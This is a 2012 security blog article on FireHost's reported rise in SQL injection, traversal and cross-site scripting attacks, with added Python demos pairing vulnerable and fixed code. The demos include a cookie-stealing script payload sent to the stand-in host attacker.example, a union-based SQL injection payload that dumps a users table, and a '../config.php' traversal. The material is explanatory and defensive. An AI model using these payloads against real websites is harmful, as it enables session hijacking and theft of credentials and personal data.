Think Information. Think Security.
New evidence suggests the loud “H@X0rs rulez” style of attack is giving way to something quieter: web hosting company FireHost reports that between the first and second quarter of 2012, the number of SQL injection attacks against its clients rose 69%. A SQL injection attack feeds crafted input into a site’s Web interface so that the application’s database query treats that input as SQL commands rather than as data, letting the attacker read information never meant for public consumption - passwords, personal information, and the holy of holies for hackers: credit card data. They are rapidly becoming the weapon of choice for attackers, FireHost Security Operations Center Manager Greg Tatum said, because that’s where the money is.

SQL injection attacks at FireHost rose from 277,770 in the first quarter to 469,983 in the second quarter of the year. That still ranks SQL injection-type attacks as only the third most popular type of attacks hitting FireHost and its clients, trailing directory traversal and cross-site scripting attacks. Directory (or path) traversal attacks try to trick a website into providing access to files on the Web server that would otherwise be restricted.

Like SQL injection attacks, they work by attacking the Web application itself, but they are also much easier to execute - often nothing more than a few “../” segments in a requested file name - which explains their top position on FireHost’s list. A traversal by itself usually only reads files, but the files an intruder goes after (configuration files holding database credentials, source code, password files) are frequently enough to turn read access into the run of the website, at which point they can make it do nearly anything they want.
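As an added illustration of the traversal mechanism described above (this is example code written for this page, not FireHost’s or anyone’s production file-serving code), the function below maps a requested file name onto a document root the naive way and then the checked way. The directory layout, file names and the “config.php” contents are constructed for the demonstration.

```python
import os
import tempfile


def build_demo_tree():
    """Creates a constructed document root plus a sensitive file one level above it.

    Returns the document root. The file names and contents are made up for
    the example; they stand in for a site's public directory and a config
    file the site should never serve.
    """
    top = tempfile.mkdtemp()
    root = os.path.join(top, "public")
    os.mkdir(root)
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    with open(os.path.join(top, "config.php"), "w") as f:
        f.write("<?php $db_pass = 'constructed-secret'; ?>")
    return root


def serve_file_vulnerable(root, requested):
    """Maps the requested name onto the document root without checking it.

    os.path.join happily follows '..' segments, and if `requested` is an
    absolute path it discards `root` entirely, so '../config.php' walks
    straight out of the public directory.
    """
    with open(os.path.join(root, requested), "rb") as f:
        return f.read()


def serve_file_safe(root, requested):
    """Resolves the final path and refuses anything outside the document root."""
    real_root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(real_root, requested))
    # realpath() collapses '..' and follows symlinks, so the comparison is
    # made on the path that would actually be opened. If the shared prefix
    # of root and target is not the root itself, the request escaped.
    if os.path.commonpath([real_root, target]) != real_root:
        raise PermissionError("path escapes document root: %r" % requested)
    with open(target, "rb") as f:
        return f.read()


if __name__ == "__main__":
    root = build_demo_tree()
    print("vulnerable handler returned:", serve_file_vulnerable(root, "../config.php"))
    try:
        serve_file_safe(root, "../config.php")
    except PermissionError as e:
        print("safe handler refused:", e)
```

The check is done on the resolved path rather than by stripping “../” from the input, because encoded, doubled or platform-specific variants of the traversal sequence are easy to miss with string filtering.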

Cross-site scripting is almost as feared as SQL injection, but instead of mining data from a website, these attacks flip the vector around and go after individual users. In the common reflected form, the attacker embeds script in a link to the vulnerable site; when an unsuspecting user clicks it, the site echoes the script back into its own page and the malicious JavaScript runs in the victim’s browser with that site’s privileges, able to read session cookies or act as the logged-in user. (A stored variant plants the script in the site’s own content, so no crafted link is needed.)
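To make the reflected case concrete, here is an added example (not code from the article or from any site it mentions) that simulates a search page taking its “q” parameter from the URL the victim clicked. The host names, the payload and the page markup are constructed for the demonstration.

```python
import html
from urllib.parse import parse_qs, urlencode, urlparse


def render_search_vulnerable(query):
    """Echoes the search term into the page as raw HTML."""
    return "<p>Results for: " + query + "</p>"


def render_search_safe(query):
    """Escapes the term so the browser renders it as text, not markup.

    quote=True also escapes quotes, which matters when the value lands
    inside an attribute rather than between tags.
    """
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def handle_request(url, render):
    """Simulates the site: pull q out of the clicked URL and render the page."""
    params = parse_qs(urlparse(url).query)
    query = params.get("q", [""])[0]
    return render(query)


# Constructed payload: ships the victim's cookies for the vulnerable site
# to an attacker-controlled host. Both host names are hypothetical.
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
CRAFTED_URL = "https://shop.example/search?" + urlencode({"q": PAYLOAD})


if __name__ == "__main__":
    print("link the victim clicks:", CRAFTED_URL)
    print("vulnerable page:", handle_request(CRAFTED_URL, render_search_vulnerable))
    print("escaped page:   ", handle_request(CRAFTED_URL, render_search_safe))
```

The vulnerable page contains the script tag verbatim, so the browser executes it as part of shop.example’s own page; the escaped page shows the same characters as harmless text.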

Even though SQL injections are not as common, they grab bigger headlines because when they’re successful, they can cause a lot of user pain at once. The breach of about 450,000 Yahoo Voices account passwords disclosed on July 11 reportedly used a union-based SQL injection, in which the attacker appends a UNION SELECT to the application’s own query so that rows from a table the page was never meant to display come back with the normal results. Unless evidence surfaces after the fact (little clues can help, such as nearly half a million account passwords suddenly showing up on a hacker community forum), SQL injections are usually very hard to detect: to the Web server a malicious request looks like any other page load, and without logging of the queries actually sent to the database there is little to see. That is the way profit-motivated hackers like it.
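The following is an added example illustrating both the injection mechanism described at the top of the article and the union-based technique mentioned here; it is written for this page and is not code from FireHost, Yahoo or the article’s author. It uses an in-memory SQLite database with constructed tables and rows (the e-mail addresses and passwords are made up), shows an article search built by string concatenation being turned into a dump of the users table, and then the same search with a bound parameter.

```python
import sqlite3

# Constructed sample schema and rows for the demonstration; none of this is
# real account data.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT);
INSERT INTO articles VALUES (1, 'Welcome', 'First post');
INSERT INTO articles VALUES (2, 'Hosting tips', 'Keep software patched');
INSERT INTO users VALUES (1, 'alice@example.com', 'hunter2');
INSERT INTO users VALUES (2, 'bob@example.com', 'letmein');
"""


def make_db():
    """In-memory SQLite database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    """Article search that splices the user's term straight into the SQL text.

    The database cannot tell where the query ends and the input begins, so
    any quote, UNION or comment marker in `term` is executed as SQL.
    """
    sql = "SELECT title, body FROM articles WHERE title LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """The same search with a bound parameter: the term travels as data.

    The SQL text is fixed before the driver ever sees the input, so a quote
    or UNION in `term` can only ever be part of the LIKE pattern.
    """
    sql = "SELECT title, body FROM articles WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


# A union-based payload of the kind the article mentions. It closes the
# LIKE string, appends a SELECT with the same number of columns from the
# users table, and comments out the trailing quote of the original query.
# Against the vulnerable search the executed statement becomes:
#   SELECT title, body FROM articles WHERE title LIKE '%x%'
#   UNION SELECT email, password FROM users -- %'
UNION_PAYLOAD = "x%' UNION SELECT email, password FROM users -- "


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable search returned:", search_vulnerable(conn, UNION_PAYLOAD))
    print("parameterised search returned:", search_safe(conn, UNION_PAYLOAD))
```

Matching the column count of the original SELECT is what makes the UNION legal; in a real attack the number is found by trial and error, which is also why a burst of failed queries against one page is one of the few signals a database-side log will show.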

Defacing websites will always remain popular among a certain set of hackers. But the days of the loud and obnoxious attacks being the worst we have to worry about are coming to a close. Now it’s the silent but deadly attacks that Web administrators need to fear the most.

Cross-posted from: Read Write Web Enterprise
9/4/2012 03:09:55 pm

Thanks to you! Finally I got some stuff for security. I was searching for some material related to this matter of web security. Very useful and very informative. Thanks once again, and do share some more posts if you have them!

9/30/2012 09:07:13 pm

All the contents you mentioned in the post are too good and can be very useful. I will keep it in mind. Thanks for sharing the information; keep updating, looking forward to more posts. Thanks
